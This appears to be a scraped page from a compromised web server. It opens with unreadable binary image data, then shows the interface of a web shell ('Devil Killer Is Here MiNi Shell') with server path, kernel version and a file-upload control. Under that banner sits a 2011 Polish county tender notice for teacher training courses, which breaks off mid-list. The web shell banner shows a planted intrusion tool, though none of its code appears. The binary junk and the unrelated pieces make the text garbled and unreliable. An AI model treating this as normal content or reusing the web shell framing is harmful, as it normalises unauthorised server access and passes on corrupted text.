JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110318/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110318/89603-N-2011.html

<p class="kh_header"><b>Legionowo: szkolenie w ramach projektu Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego</b><br>
<b>Numer ogłoszenia: 89603 - 2011; data zamieszczenia: 18.03.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Legionowski , ul. gen. Władysława Sikorskiego 11, 05-119 Legionowo, woj. mazowieckie, tel. 22 7840872, faks 22 7742551.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-legionowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> szkolenie w ramach projektu Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przeprowadzenie szkoleń dla uczestników projektu Świadomy nauczyciel, czyli nowoczesna kadra oświatowa w szkołach powiatu legionowskiego, realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, działanie 9.4, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
W ramach realizacji zamówienia Wykonawca zobowiązany jest do przeprowadzenia szkolenia, w tym realizacji części merytorycznej szkolenia, zapewnienia sal szkoleniowych, wyżywienia i zapewnienia uczestnikom materiałów szkoleniowych. W przypadku powierzenia części zamówienia podwykonawcom Zamawiający żąda wskazania, które części zamówienia będą powierzone.
Przedmiot zamówienia został podzielony na dziewięć ofert częściowych.
Do obowiązków Wykonawcy dla każdej oferty częściowej należy:
1) Zapewnienie sali szkoleniowej wraz z wyposażeniem
a) Wyposażenie:
laptop z systemem operacyjnym Windows oraz pakietem biurowym umożliwiającym odtwarzanie prezentacji multimedialnych, 
projektor multimedialny,
ekran do projektora multimedialnego,
mikrofon z nagłośnieniem,
tablica typu flipchart wraz z 2 blokami papierowymi na każde szkolenie lub tablica ścieralna z 2 blokami papierowymi i 1 gąbką,
pisaki do bloku papierowego lub tablicy ścieralnej (na każde szkolenie 2 komplety pisaków w kolorach: czarny, czerwony, zielony, niebieski)
oznakowanie sal, w których będą odbywały się zajęcia, zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki
b) Warunki techniczne:
sala szkoleniowa z wydzieloną powierzchnią na realizację części teoretycznej szkolenia oraz z powierzchnią przeznaczoną na ćwiczenia, zajęcia interaktywne, gry i warsztaty,
miejsca siedzące - krzesła miękkie z obiciem tapicerskim i oparciem w ilości odpowiadającej ilości osób szkolonych i szkolących,
ławki/stoły w ilości umożliwiającej uczestnikom szkolenia swobodną pracę - sporządzanie notatek i posługiwanie się materiałami szkoleniowymi,
uczestnicy szkoleń muszą mieć zapewniony dostęp do węzła sanitarnego,
sala musi posiadać dostęp do światła dziennego oraz system klimatyzacji,
sala musi spełniać wszelkie wymogi bezpieczeństwa przewidziane przepisami BHP i P-POŻ.
2) Zapewnienie wyżywienia uczestnikom szkolenia
a) posiłki:
w trakcie szkolenia Wykonawca zapewni uczestnikom oraz Trenerowi/Trenerom serwis kawowy składający się z: gorącej kawy (w ilości 500 ml/osobę), gorącej herbaty (w ilości 250 ml/osobę), wody mineralnej (w ilości 500 ml/osobę), ciast (dwa rodzaje o wadze łącznej 250 g/osobę), soków (dwa rodzaje w ilości 250 ml/osobę), mleka do kawy, cytryny, cukru, serwetek papierowych (w ilości 5 szt./osobę),
serwis kawowy musi być serwowany w naczyniach szklanych i sztućcach stalowych,
w trakcie szkolenia Wykonawca zapewni uczestnikom oraz Trenerowi/Trenerom lunch składający się z: I danie - zupa (450 ml/osobę), pieczywa (bułka lub chleb), II danie - mięso lub ryba (min. 250 g/osobę), ziemniaki/frytki/ryż (min. 300 g/osobę), 3 rodzaje surówek (w wadze łącznej 150 g/osobę), dodatkowo - kawa (200 ml/osobę), herbata (200 ml/osobę), sok owocowy (250 ml/osobę),
lunch musi być podany w naczyniach szklanych i sztućcach stalowych,
lunch musi być posiłkiem pełnowartościowym, zgodnie z technologią żywienia człowieka,
godziny przerw kawowych oraz lunchu muszą być ustalone w uzgodnieniu z Zamawiającym, stosownie do harmonogramu każdego ze szkoleń,
b) warunki techniczne:
serwis kawowy musi być zorganizowany w miejscu znajdującym się w bezpośrednim sąsiedztwie sali szkoleniowej,
sala restauracyjna musi pomieścić minimum 17 osób, 
sala musi spełniać wszelkie wymogi bezpieczeństwa przewidziane przepisami BHP i P-POŻ oraz Inspektora Sanitarnego.
3) Zapewnienie materiałów szkoleniowych dla uczestników szkoleń, przy czym materiały szkoleniowe muszą zawierać: logo POKL, logo Unii Europejskiej wraz z odwołaniem do Unii Europejskiej i Europejskiego Funduszu Społecznego, logo powiatu legionowskiego oraz informację Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
4) Przeprowadzenie na koniec każdego szkolenia ankiety ewaluacyjnej wśród uczestników szkolenia. Odpowiednią ilość ankiet ewaluacyjnych Wykonawca otrzyma od Zamawiającego przed rozpoczęciem szkolenia. 
5) Przygotowanie i wręczenie uczestnikom zaświadczeń potwierdzających udział w szkoleniu.
6) Przekazanie Zamawiającemu, po zakończeniu szkolenia dokumentów:
listę obecności z własnoręcznymi podpisami uczestników szkolenia w każdym dniu szkolenia oraz podpisem Trenera/Trenerów (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski),
program szkolenia i dziennik zajęć podpisany przez Trenera/Trenerów (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski),
potwierdzenie odbioru materiałów szkoleniowych wraz z jednym egzemplarzem materiałów,
kopie wydanych zaświadczeń oraz listę potwierdzającą ich odbiór przez uczestników szkolenia, 
wypełnione przez uczestników ankiety ewaluacyjne.
7) Podczas realizacji szkolenia Wykonawca zobowiązany jest informować uczestników szkoleń o fakcie współfinansowania szkolenia ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

1. Oferta częściowa nr 1 Fundusze zewnętrzne dla edukacji
Pożądany termin realizacji usługi: kwiecień 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 1 dzień - 6 godz. lekcyjnych 
Planowana liczba uczestników 1 grupy szkoleniowej: od 9 do 11 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski).
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
Omówienie dostępnych programów z obszaru edukacji
a)	Program Lifelong learning - komponenty
b)	Comenius
c)	Leonardo Da Vinci 
d)	eTwinning
e)	Program Młodzież w Działaniu
f)	Europejski Fundusz Społeczny
g)	Program Operacyjny Kapitał Ludzki
h)	Regionalny Program Operacyjny
Dobre Praktyki - przykłady z różnych programów
Omówienie procedury aplikowania o środki na przykładzie PO KL 
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, 1/2 case study, omówienie przykładowych projektów. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami. 

2. Oferta częściowa nr 2 Zasady przygotowywania wniosków aplikacyjnych do zewnętrznych źródeł finansowania, w tym do Programu Operacyjnego Kapitał Ludzki
Termin realizacji usługi: kwiecień 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 3 dni po 5 godz. lekcyjnych łącznie 15 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 10 do 12 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:
a)Omówienie cech wewnętrznie spójnego projektu - na jakie pytania powinniśmy znaleźć odpowiedzi w dobrze przemyślanym i napisanym projekcie (opracowanie wniosku o dofinansowanie, analiza problemów, analiza celów projektu, określenie działań, rezultatów i kosztów, rodzaje kosztów kwalifikowanych),
b)Spójność działań - opracowanie harmonogramu projektu,
c)Ocena formalna i merytoryczna wniosku. 
2)Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, 1/2 warsztaty, zajęcia interaktywne, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami. 
3. Oferta częściowa nr 3 Pierwsza pomoc w nagłych wypadkach
Termin realizacji usługi: kwiecień 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 2 dni po 5 godz. lekcyjnych - łącznie 10 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 13 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski).
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a) omówienie podstaw prawnych udzielania pierwszej pomocy,
b) ocena wstępna poszkodowanego, sprawdzenie stanu świadomości, oceny czynności życiowych,
c) bezpieczeństwo ratownika i poszkodowanego,
d) zasady udzielania pierwszej pomocy w przypadkach zranień, krwawień tętniczych i żylnych, złamań kości oparzeń i omdleń,
e) opatrywania ran, unieruchomienia kończyn,
f) wykonywania sztucznego oddychania i pośredniego masażu serca (ćwiczenia z fantomem).
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 2/3 wykład z wykorzystaniem technik multimedialnych, 1/3 warsztaty, zajęcia interaktywne, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami. 

4. Oferta częściowa nr 4 Kurs kierowników wycieczek szkolnych
Termin realizacji usługi: maj 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą)
Planowana ilość grup szkoleniowych: 1
Czas trwania 1 kursu dla 1 grypy: 2 dni - po 5 godz. lekcyjnych - łącznie 10 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 13 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej kursu, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji kursu wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym kursu następujących zagadnień:  
a)	 przepisy regulujące organizację turystki szkolnej, 
b)	organizacja wycieczek szkolnych,
c)	obowiązki kierownika wycieczek,
d)	bezpieczeństwo życia i zdrowia uczestników wycieczek szkolnych,
e)	zasady udzielania pierwszej pomocy przedlekarskiej.   

5. Oferta częściowa nr 5 Profilaktyka uzależnień i zachowań destrukcyjnych
Termin realizacji usługi: maj 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 1
Czas trwania 1 szkolenia dla 1 grupy: 1 dzień - 6 godz. lekcyjnych 
Planowana liczba uczestników 1 grupy szkoleniowej: od 13 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski).
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a)warunki, formy i metody skutecznych działań profilaktycznych w szkole,
b)podstawowe zasady konstruowania szkolnych programów profilaktycznych,
c)przykłady profesjonalnych działań profilaktycznych i Szkolnych Programów Profilaktycznych,
d)możliwości pozyskiwania zewnętrznych środków finansowych na szkolne działania profilaktyczne.
2) W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.
6. Oferta częściowa nr 6 Przygotowanie uczniów do egzaminu zawodowego
Termin realizacji usługi: kwiecień 2011r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 3 dni - po 5 godz. lekcyjnych - łącznie 15 godz.
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a)analiza obowiązujących podstaw programowych i standardów egzaminacyjnych w zawodach nauczanych na terenie powiatu legionowskiego,
b)ćwiczenia związane z rozwiązywaniem zadań egzaminacyjnych w powyższych zawodach,
c)uświadomienie uczniom roli egzaminu zawodowego dla środowiska pracodawców.
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.

7. Oferta częściowa nr 7 Jak zbudować program naprawczy w zakresie podniesienia efektywności kształcenia zawodowego
Termin realizacji usługi: czerwiec 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 1
Czas trwania 1 szkolenia dla 1 grupy: 3 dni - po 5 godz. lekcyjnych - łącznie 15 godz.
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski).
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a)wypracowanie metodyki tworzenia szkolnych programów nauczania dla zawodu oraz pisania tych programów, 
b)opracowanie szkolnych planów nauczania na poziomie technikum z uwzględnieniem przedmiotów rozszerzonych ogólnokształcących (nowa matura w technikum po 2012 r.) związanych z nauczanym zawodem - zgodnie z nowymi podstawami programowymi  kształcenia ogólnego. 
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.

8. Oferta częściowa nr 8 Praktyczne i problemowe metody nauczania przedmiotów zawodowych
Termin realizacji usługi: czerwiec 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 2
Czas trwania 1 szkolenia dla 1 grupy: 2 dni - po 4 godz. lekcyjne - łącznie 8 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a)realizacja metod aktywnych np. projektów, metaplanu w kształceniu zawodowym, 
b)współpraca z pracodawcami w zakresie wypracowania wspólnego programu kształcenia praktycznego  w danym zawodzie. 
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami.

9. Oferta częściowa nr 9 Analiza i interpretacja wyników sprawdzianu/egzaminów zewnętrznych oraz ich wykorzystanie do poprawy jakości kształcenia
Termin realizacji usługi: kwiecień 2011 r. (dokładna data szkolenia ustalona zostanie z wybranym w ramach postępowania o udzielenie zamówienia publicznego Wykonawcą).
Planowana ilość grup szkoleniowych: 3
Czas trwania 1 szkolenia dla 1 grupy: 2 dni - po 4 godz. lekcyjne - łącznie 8 godz. 
Planowana liczba uczestników 1 grupy szkoleniowej: od 12 do 15 osób + wykładowca/wykładowcy (jeżeli dane szkolenie prowadzone będzie przez zespół trenerski)
Ostateczną liczbę uczestników szkolenia Zamawiający przedstawi Wykonawcy w terminie nie późniejszym niż 7 dni przed rozpoczęciem danego szkolenia.
1) Realizacja części merytorycznej szkolenia, zgodnie ze szczegółowym harmonogramem realizacji przedmiotu zamówienia, który Wykonawca załączy do składanej oferty. W zakres realizacji szkolenia wchodzi m.in.: 
Uwzględnienie w zakresie merytorycznym szkolenia następujących zagadnień:  
a)omówienie aktów prawnych związanych z egzaminem zawodowym,
b)analiza wyników egzaminów zawodowych z trzech ostatnich lat w zawodach nauczanych na terenie powiatu legionowskiego,
c)wypracowanie rozwiązań związanych z: poprawą efektywności kształcenia i uczestnictwa absolwentów szkół w egzaminach zawodowych.
2) Zapewnienie metodologii realizacji szkolenia w proporcji: 1/2 wykład z wykorzystaniem technik multimedialnych, ? warsztaty, ćwiczenia. W ramach szkolenia 1 godz. zajęć musi być poświęcona na indywidualne konsultacje uczestników z trenerem/trenerami..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.30.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 04.04.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania doświadczenia, Zamawiający uzna wykazanie się przez Wykonawcę w okresie 3 ostatnich lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) przed upływem terminu składania ofert, co najmniej 3 usługami porównywalnymi z przedmiotem zamówienia - z zastrzeżeniem, że przez usługę porównywalną z przedmiotem zamówienia Zamawiający rozumie przeprowadzenie szkolenia o tematyce odpowiadającej danej części zmówienia wraz z jego kompleksową obsługą - spełnienie warunku weryfikowane będzie na podstawie wykazu wykonanych lub wykonywanych usług z podaniem ich wartości, przedmiotu, dat wykonywania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - Zamawiający uzna, gdy Wykonawca dysponuje lub będzie dysponował, co najmniej jedną osobą (trenerem) do realizacji danego szkolenia posiadającego wykształcenie odpowiadające zakresowi tematycznemu szkolenia oraz min. 3 letnie doświadczenie dydaktyczne (tj. w prowadzeniu wykładów i/lub szkoleń i/lub wygłaszania referatów na konferencjach itp.) - spełnienie warunku weryfikowane będzie na podstawie wykazu osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
